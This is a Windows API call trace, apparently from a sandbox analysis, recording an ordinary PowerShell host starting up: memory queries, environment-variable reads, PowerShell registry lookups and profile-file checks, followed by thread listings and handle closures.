	[0432.393] CoTaskMemFree (pv=0x49d6c0) 
	[0432.395] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.395] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.395] CoTaskMemFree (pv=0x49d6c0) 
	[0432.396] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.396] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.396] CoTaskMemFree (pv=0x49d6c0) 
	[0432.397] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.397] CoTaskMemFree (pv=0x49d6c0) 
	[0432.398] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.398] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.416] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.418] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.418] CoTaskMemFree (pv=0x49d6c0) 
	[0432.555] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x49d7d0
	[0432.555] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x49d8e0
	[0432.765] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.849] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.851] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.851] VirtualQuery (in: lpAddress=0x24a160, lpBuffer=0x24b020, dwLength=0x30 | out: lpBuffer=0x24b020*(BaseAddress=0x24a000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.864] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.864] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.864] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.864] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.864] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.864] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.865] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.866] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.867] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.867] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.867] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0433.868] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0433.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.868] CoTaskMemFree (pv=0x49d9f0) 
	[0433.871] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0433.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0433.871] CoTaskMemFree (pv=0x49d9f0) 
	[0435.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0435.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0435.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0435.030] VirtualQuery (in: lpAddress=0x24b9c0, lpBuffer=0x24c880, dwLength=0x30 | out: lpBuffer=0x24c880*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0435.036] VirtualQuery (in: lpAddress=0x24b9c0, lpBuffer=0x24c880, dwLength=0x30 | out: lpBuffer=0x24c880*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0435.036] VirtualQuery (in: lpAddress=0x24b210, lpBuffer=0x24c0d0, dwLength=0x30 | out: lpBuffer=0x24c0d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0435.036] VirtualQuery (in: lpAddress=0x24b210, lpBuffer=0x24c0d0, dwLength=0x30 | out: lpBuffer=0x24c0d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0435.037] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d818 | out: phkResult=0x24d818*=0x2f8) returned 0x0
	[0435.037] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d79c, lpData=0x0, lpcbData=0x24d798*=0x0 | out: lpType=0x24d79c*=0x1, lpData=0x0, lpcbData=0x24d798*=0x56) returned 0x0
	[0435.037] CoTaskMemAlloc (cb=0x5a) returned 0x1b84d2e0
	[0435.037] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d76c, lpData=0x1b84d2e0, lpcbData=0x24d768*=0x56 | out: lpType=0x24d76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d768*=0x56) returned 0x0
	[0435.037] CoTaskMemFree (pv=0x1b84d2e0) 
	[0435.038] RegCloseKey (hKey=0x2f8) returned 0x0
	[0435.038] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d818 | out: phkResult=0x24d818*=0x2f8) returned 0x0
	[0435.038] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d79c, lpData=0x0, lpcbData=0x24d798*=0x0 | out: lpType=0x24d79c*=0x1, lpData=0x0, lpcbData=0x24d798*=0x56) returned 0x0
	[0435.038] CoTaskMemAlloc (cb=0x5a) returned 0x1b84d2e0
	[0435.038] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d76c, lpData=0x1b84d2e0, lpcbData=0x24d768*=0x56 | out: lpType=0x24d76c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d768*=0x56) returned 0x0
	[0435.038] CoTaskMemFree (pv=0x1b84d2e0) 
	[0435.038] RegCloseKey (hKey=0x2f8) returned 0x0
	[0435.039] CoTaskMemAlloc (cb=0x20c) returned 0x1b825540
	[0435.039] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b825540 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0435.039] CoTaskMemFree (pv=0x1b825540) 
	[0435.039] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0435.039] CoTaskMemAlloc (cb=0x20c) returned 0x1b825540
	[0435.039] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b825540 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0435.039] CoTaskMemFree (pv=0x1b825540) 
	[0435.039] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0435.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0435.040] SetErrorMode (uMode=0x1) returned 0x1
	[0435.040] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d780 | out: lpFileInformation=0x24d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0435.040] SetErrorMode (uMode=0x1) returned 0x1
	[0435.040] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0435.040] SetErrorMode (uMode=0x1) returned 0x1
	[0435.040] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d780 | out: lpFileInformation=0x24d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0435.040] SetErrorMode (uMode=0x1) returned 0x1
	[0435.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0435.041] SetErrorMode (uMode=0x1) returned 0x1
	[0435.041] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d780 | out: lpFileInformation=0x24d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0435.041] SetErrorMode (uMode=0x1) returned 0x1
	[0435.041] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0435.041] SetErrorMode (uMode=0x1) returned 0x1
	[0435.041] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d780 | out: lpFileInformation=0x24d780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0435.041] SetErrorMode (uMode=0x1) returned 0x1
	[0435.042] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.042] CoTaskMemFree (pv=0x49d9f0) 
	[0435.042] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.043] CoTaskMemFree (pv=0x49d9f0) 
	[0435.043] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.043] CoTaskMemFree (pv=0x49d9f0) 
	[0435.044] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.044] CoTaskMemFree (pv=0x49d9f0) 
	[0435.048] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.048] CoTaskMemFree (pv=0x49d9f0) 
	[0435.049] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.049] CoTaskMemFree (pv=0x49d9f0) 
	[0435.051] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0435.051] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24d960 | out: lpMode=0x24d960) returned 1
	[0435.052] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.052] CoTaskMemFree (pv=0x49d9f0) 
	[0435.055] SetEvent (hEvent=0x320) returned 1
	[0435.055] SetEvent (hEvent=0x2f8) returned 1
	[0435.055] SetEvent (hEvent=0x36c) returned 1
	[0435.055] SetEvent (hEvent=0x2f0) returned 1
	[0435.057] CoTaskMemAlloc (cb=0x104) returned 0x49d9f0
	[0435.057] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d9f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0435.057] CoTaskMemFree (pv=0x49d9f0) 
	[0435.057] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x38c) returned 0x0
	[0435.057] RegQueryValueExW (in: hKey=0x38c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24d63c, lpData=0x0, lpcbData=0x24d638*=0x0 | out: lpType=0x24d63c*=0x0, lpData=0x0, lpcbData=0x24d638*=0x0) returned 0x2

Thread:
	id = 194
	os_tid = 0xb34


Thread:
	id = 195
	os_tid = 0x9b8


Thread:
	id = 392
	os_tid = 0x1008


Thread:
	id = 559
	os_tid = 0x53c


Thread:
	id = 592
	os_tid = 0x1278


Thread:
	id = 593
	os_tid = 0xb24

	[0405.696] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0429.986] LocalFree (hMem=0x3e72b0) returned 0x0
	[0429.987] CloseHandle (hObject=0x30c) returned 1
	[0429.987] CloseHandle (hObject=0x13) returned 1
	[0430.720] RegCloseKey (hKey=0x2f0) returned 0x0
	[0430.721] LocalFree (hMem=0x3e7280) returned 0x0
	[0430.721] RegCloseKey (hKey=0x31c) returned 0x0
	[0430.721] CloseHandle (hObject=0xf) returned 1
	[0430.722] RegCloseKey (hKey=0x2f8) returned 0x0
	[0430.722] RegCloseKey (hKey=0x2f4) returned 0x0
	[0431.559] RegCloseKey (hKey=0x328) returned 0x0
	[0431.559] RegCloseKey (hKey=0x324) returned 0x0
	[0431.559] RegCloseKey (hKey=0x320) returned 0x0
	[0431.560] RegCloseKey (hKey=0x2f0) returned 0x0
	[0431.560] RegCloseKey (hKey=0x36c) returned 0x0
	[0431.560] RegCloseKey (hKey=0x2f8) returned 0x0
